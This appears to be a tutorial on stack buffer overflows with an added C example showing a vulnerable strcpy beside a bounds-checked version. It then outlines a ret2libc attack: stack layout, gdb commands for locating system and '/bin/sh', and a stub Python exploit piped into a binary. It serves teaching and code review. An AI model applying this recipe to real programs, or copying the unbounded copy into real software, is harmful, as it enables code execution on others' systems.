How Buffer Overflow Works
Overflowing the buffer so that it overwrites the saved return address on the stack lets us redirect execution to an address of our choosing, which ends in code execution.
Keep in mind that if NX is enabled, we can't just jump directly to shellcode placed on the stack.
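The root cause of the overflow described above, as an added example that is not from the original post: a fixed-size stack buffer filled with an unbounded copy, next to a hardened version that checks the length first. The function names `greet_vulnerable` and `greet_hardened`, the buffer size `NAME_LEN` and the sample inputs are all constructed for this illustration.

```c
/* Added example (not from the original post): why a stack buffer overflow
 * happens, and the bound check that prevents it. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN 64   /* constructed buffer size for the example */

/* VULNERABLE: strcpy() keeps copying until it finds a NUL byte. Any input of
 * NAME_LEN or more bytes runs past buf into the saved frame pointer and the
 * saved return address that sit above it on the stack, which is exactly the
 * memory an attacker-controlled payload overwrites. */
int greet_vulnerable(const char *input) {
    char buf[NAME_LEN];
    strcpy(buf, input);               /* no bound check: overflow on long input */
    return (int)strlen(buf);          /* length of what was stored */
}

/* HARDENED: the caller passes the input length, the function refuses anything
 * that does not fit with a terminating NUL, and the copy is bounded. */
int greet_hardened(const char *input, size_t input_len) {
    char buf[NAME_LEN];
    if (input == NULL || input_len >= NAME_LEN) {
        return -1;                    /* reject instead of silently overrunning */
    }
    memcpy(buf, input, input_len);    /* bounded copy */
    buf[input_len] = '\0';            /* always NUL-terminate */
    return (int)strlen(buf);
}

/* Demonstrates the check with a constructed over-long input (200 'A' bytes):
 * the hardened function returns -1 rather than touching memory past buf. */
int hardened_rejects_overlong(void) {
    char overlong[201];
    memset(overlong, 'A', 200);
    overlong[200] = '\0';
    return greet_hardened(overlong, 200);
}

/* Reads one line from stdin with a bounded read (fgets never writes more than
 * the size it is given) and hands it to the hardened copy. */
int main(void) {
    char line[512];                   /* constructed input buffer */
    if (fgets(line, sizeof line, stdin) == NULL) {
        return 1;
    }
    line[strcspn(line, "\n")] = '\0'; /* drop the trailing newline, if any */
    int n = greet_hardened(line, strlen(line));
    if (n < 0) {
        fprintf(stderr, "input rejected: longer than %d bytes\n", NAME_LEN - 1);
        return 1;
    }
    printf("stored %d bytes safely\n", n);
    return 0;
}
```

The hardened version is the shape to look for in code review: the copy length is derived from the destination size, the NUL terminator is written explicitly, and over-long input is an error the caller sees, not memory the caller never sees being written.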
Stack state
| junk_buf + system_addr + exit_addr + /bin/sh |
Since we overwrite the return address with system's address, we can supply system's argument on the stack and make it execute commands.
Chain Chain Chain the ROP baby
Simple ROP logic, locally, is this:
1st –> Find the exact number of bytes needed to fill the buffer and the saved EBP.
2nd –> To overwrite the return address, find the address of system with “p system” in gdb.
3rd –> Search for “/bin/sh” in the program with “searchmem /bin/sh” so you can skip calculating the offset yourself; this way the address is already resolved. Don't care about exit.
4th –> Construct your chain like this: “junk_buf + system_addr + exit_addr + /bin/sh”
EXTERMINATE!!
Finding Addresses Locally
Start with this:
gdb ./vuln
gdb also lets you do address arithmetic directly, for example:
(gdb) x/x 0xb7e97000 + 0x00038fb0
Finding the libc base address
info proc map
Finding the system address
p system
Finding /bin/sh
searchmem /bin/sh
Exploit in real action
libc_base_addr = ldd /home/vuln | grep libc
Example python script
import struct
To run the script against the binary, use:
(python exploit.py; cat) | /home/vuln